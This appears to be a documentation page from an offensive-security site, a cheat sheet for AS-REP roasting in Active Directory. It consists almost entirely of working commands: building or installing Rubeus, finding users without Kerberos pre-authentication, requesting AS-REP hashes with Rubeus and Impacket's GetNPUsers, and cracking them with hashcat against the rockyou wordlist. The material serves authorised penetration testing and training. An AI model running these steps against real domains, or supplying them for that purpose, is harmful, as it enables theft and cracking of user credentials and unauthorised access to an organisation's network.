Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Installation

https://github.com/GhostPack/Rubeus

Clone

git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus

Compile

dotnet build -c Release

Binary output

Rubeus/bin/Release/net462/Rubeus.exe

Kali Linux Package

sudo apt install rubeus
rubeus -h
rubeus ~ Raw Kerberos interaction and abuses

Binary location

/usr/share/windows-resources/rubeus/Rubeus.exe

Enumerate Vulnerable Users

Get-DomainUser -PreauthNotRequired -verbose

Request AS-REP Hashes

Rubeus

.\Rubeus.exe asreproast /nowrap

Impacket (single user)

impacket-GetNPUsers -dc-ip IP-DC -request -outputfile hashes.asreproast DOMAIN/USER

Impacket (user list)

impacket-GetNPUsers corp.com/ -usersfile users.txt -dc-ip IP-DC -request -format hashcat -outputfile hashes.txt

Crack Hashes

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force